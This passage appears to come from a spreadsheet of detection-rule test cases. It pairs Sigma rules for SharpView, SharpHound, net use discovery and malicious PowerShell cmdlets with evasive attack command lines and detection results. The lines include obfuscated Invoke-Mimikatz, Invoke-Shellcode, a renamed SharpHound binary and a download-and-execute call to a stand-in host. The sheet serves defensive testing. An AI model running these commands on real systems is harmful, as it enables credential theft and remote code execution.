      <c r="F709" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G709" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H709" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I709" s="43" t="n"/>
      <c r="J709" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K709" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="710" ht="15.75" customHeight="1" s="42">
      <c r="A710" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B710" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C710" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D710" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E710" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMand "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F710" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G710" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H710" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I710" s="43" t="n"/>
      <c r="J710" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K710" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="711" ht="15.75" customHeight="1" s="42">
      <c r="A711" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B711" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C711" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D711" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E711" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "[Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\temp\sv_mod.bin')).EntryPoint.Invoke($null, @(,[string[]]@('Get-Doma'+'inComputer')))"</t>
        </is>
      </c>
      <c r="F711" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G711" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H711" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I711" s="43" t="n"/>
      <c r="J711" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K711" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="712" ht="15.75" customHeight="1" s="42">
      <c r="A712" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B712" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C712" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D712" s="36" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E712" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F712" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G712" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H712" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I712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712" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K712" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="713" ht="15.75" customHeight="1" s="42">
      <c r="A713" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B713" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C713" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D713" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E713" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nOprOFILe -ep Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F713" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G713" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I713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713" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K713" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="714" ht="15.75" customHeight="1" s="42">
      <c r="A714" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B714" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C714" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D714" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E714" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -ep Bypass -CommaNd "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F714" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G714" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I714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714" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K714" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="715" ht="15.75" customHeight="1" s="42">
      <c r="A715" s="43" t="n"/>
      <c r="B715" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C715" s="36" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D715" s="36" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E715" s="43" t="inlineStr">
        <is>
          <t>net.exe "use"</t>
        </is>
      </c>
      <c r="F715" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G715" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H715" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I715" s="43" t="n"/>
      <c r="J715" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K715" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="716" ht="15.75" customHeight="1" s="42">
      <c r="A716" s="43" t="n"/>
      <c r="B716" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C716" s="36" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D716" s="36" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E716" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-SmbConnection"</t>
        </is>
      </c>
      <c r="F716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I716" s="43" t="n"/>
      <c r="J716" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K716" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="717" ht="15.75" customHeight="1" s="42">
      <c r="A717" s="43" t="n"/>
      <c r="B717" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C717" s="36" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D717" s="36" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E717" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAnD "Get-SmbConnection"</t>
        </is>
      </c>
      <c r="F717" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G717" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H717" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I717" s="43" t="n"/>
      <c r="J717" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K717" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="718" ht="15.75" customHeight="1" s="42">
      <c r="A718" s="43" t="n"/>
      <c r="B718" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C718" s="36" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D718" s="36" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E718" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMANd "Get-SmbConnection"</t>
        </is>
      </c>
      <c r="F718" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G718" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H718" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I718" s="43" t="n"/>
      <c r="J718" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K718" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="719" ht="15.75" customHeight="1" s="42">
      <c r="A719" s="43" t="n"/>
      <c r="B719" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C719" s="36" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D719" s="36" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E719" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-SmbConnection"</t>
        </is>
      </c>
      <c r="F719" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G719" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H719" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I719" s="43" t="n"/>
      <c r="J719" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K719" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="720" ht="15.75" customHeight="1" s="42">
      <c r="A720" s="43" t="n"/>
      <c r="B720" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C720" s="36" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D720" s="36" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E720" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMaND "Get-SmbConnection"</t>
        </is>
      </c>
      <c r="F720" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G720" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H720" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I720" s="36" t="n"/>
      <c r="J720" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K720" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="721" ht="15.75" customHeight="1" s="42">
      <c r="A721" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B721" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C721" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D721" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E721" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods="All" --domain "contoso.local"</t>
        </is>
      </c>
      <c r="F721" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G721" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H721" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I721" s="43" t="n"/>
      <c r="J721" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K721" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="722" ht="15.75" customHeight="1" s="42">
      <c r="A722" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B722" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C722" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D722" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E722" s="36" t="inlineStr">
        <is>
          <t>copy SharpHound.exe not_suspicious.exe; .\not_suspicious.exe --collectionmethods "Default" --domain "contoso.local" --zipfilename:"data.zip"</t>
        </is>
      </c>
      <c r="F722" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G722" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H722" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I722" s="43" t="n"/>
      <c r="J722" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K722" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="723" ht="15.75" customHeight="1" s="42">
      <c r="A723" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B723" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C723" s="36" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D723" s="36" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E723" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" SharpHound.exe -jsOnFolDEr C:\temp /"ZipFileName" C:\temp\sharphound.zip</t>
        </is>
      </c>
      <c r="F723" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G723" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H723" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I723" s="43" t="n"/>
      <c r="J723" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K723" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="724" ht="15.75" customHeight="1" s="42">
      <c r="A724" s="43" t="n"/>
      <c r="B724" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C724" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D724" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E724" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F724" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G724" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H724" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I724" s="43" t="n"/>
      <c r="J724" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K724" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="725" ht="15.75" customHeight="1" s="42">
      <c r="A725" s="43" t="n"/>
      <c r="B725" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C725" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D725" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E725" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F725" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G725" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H725" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I725" s="43" t="n"/>
      <c r="J725" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K725" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="726" ht="15.75" customHeight="1" s="42">
      <c r="A726" s="43" t="n"/>
      <c r="B726" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C726" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D726" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E726" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I726" s="43" t="n"/>
      <c r="J726" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K726" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="727" ht="15.75" customHeight="1" s="42">
      <c r="A727" s="43" t="n"/>
      <c r="B727" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C727" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D727" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E727" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F727" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G727" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H727" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I72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27" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K727" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="728" ht="15.75" customHeight="1" s="42">
      <c r="A728" s="43" t="n"/>
      <c r="B728" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C728" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D728" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E728" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F728" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G728" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H728" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I7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28" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K728" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="729" ht="15.75" customHeight="1" s="42">
      <c r="A729" s="43" t="n"/>
      <c r="B729" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C729" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D729" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E729" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F729" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G729" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H729" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I72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29" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K729" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="730" ht="15.75" customHeight="1" s="42">
      <c r="A730" s="43" t="n"/>
      <c r="B730" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C730" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D730" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E730" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F730" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G730" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H730" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I73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30" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K730" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="731" ht="15.75" customHeight="1" s="42">
      <c r="A731" s="43" t="n"/>
      <c r="B731" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C731" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D731" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E731" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F731" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G731" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H731" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I73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31" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K731" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="732" ht="15.75" customHeight="1" s="42">
      <c r="A732" s="43" t="n"/>
      <c r="B732" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C732" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D732" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E732" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F732" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G732" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H732" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I73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32" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K732" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="733" ht="15.75" customHeight="1" s="42">
      <c r="A733" s="43" t="n"/>
      <c r="B733" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C733" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D733" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E733" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F733" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G733" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H733" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I73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33" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K733" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="734" ht="15.75" customHeight="1" s="42">
      <c r="A734" s="43" t="n"/>
      <c r="B734" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C734" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D734" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E734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734" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G734" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H734" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I73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34" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K734" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="735" ht="15.75" customHeight="1" s="42">
      <c r="A735" s="43" t="n"/>
      <c r="B735" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C735" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D735" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E735" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F735" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G735" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H735" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I735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35" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K735" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="736" ht="15.75" customHeight="1" s="42">
      <c r="A736" s="43" t="n"/>
      <c r="B736" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C736" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D736" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E736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736" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G736" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H736" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I736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36" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K736" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="737" ht="15.75" customHeight="1" s="42">
      <c r="A737" s="43" t="n"/>
      <c r="B737" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C737" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D737" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E737" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F737" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G737" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H737" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I737" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J737" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K737" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="738" ht="15.75" customHeight="1" s="42">
      <c r="A738" s="43" t="n"/>
      <c r="B738" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C738" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D738" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E738" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F738" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G738" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H738" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I738" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
